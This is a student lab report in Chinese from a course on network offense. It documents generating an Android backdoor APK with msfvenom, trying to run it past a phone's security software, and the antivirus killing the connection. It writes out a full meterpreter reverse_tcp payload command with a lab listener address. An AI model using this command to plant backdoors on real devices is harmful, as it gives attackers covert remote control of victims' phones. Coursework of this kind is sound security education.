2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件

目录
  • 实验内容
  • 实验环境
  • 实验步骤
  • END

实验内容

  • msfvenom 生成Android平台的apk后门文件

实验环境

华为手机管家(内置Tencent、360、MODILE SECUNITY), Android程序安全补丁2020年1月1日

实验步骤

  • 将虚拟机的网络模式改为桥接模式
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件_第1张图片

  • 实现手机、虚拟机互ping
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件_第2张图片
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件_第3张图片

  • msfvenom -l payloads 找到相应的 payload
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件_第4张图片

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=5234 R > 20175234test.apk

  • msfconsole启动监听

  • 把后门程序移到手机里头

  • 安装apk报错,运行报错
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件_第5张图片

  • 解除管控,继续运行
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件_第6张图片

可以运行但是很快就又死了,最初以为是手机杀后台,尝试wakelock但是没有用,应该是杀软检测到了连接

  • 网站测试
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件_第7张图片

END

你可能感兴趣的:(2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件)